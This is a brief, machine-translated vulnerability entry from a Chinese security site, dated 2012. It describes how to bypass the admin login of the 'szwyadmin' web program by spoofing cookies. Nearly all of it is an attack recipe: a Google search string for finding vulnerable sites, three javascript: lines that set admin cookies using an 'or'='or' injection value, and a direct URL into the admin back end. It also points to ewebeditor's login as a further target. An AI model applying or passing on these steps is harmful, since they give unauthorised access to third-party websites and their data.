szwyadmin program cookies spoofing vulnerability to get shell-vulnerability warning-the black bar safety net

ID MYHACK58:62201235058
Type myhack58
Reporter 佚名
Modified 2012-09-28T00:00:00


First of all, we in Google search for keywords

Keywords:inurl:szwyadmin/login. asp

Any open a search results, open the login interface in the address bar enter the following code:


javascript:alert(document. cookie="adminuser="+escape("'or'='or'"));

javascript:alert(document. cookie="adminpass="+escape("'or'='or'"));

javascript:alert(document. cookie="admindj="+escape("1"));

Close this page

At the time you open the login screen, in the address bar login. asp to admin_index. asp, directly into the background.

You can also try ewebeditor/admin_login. asp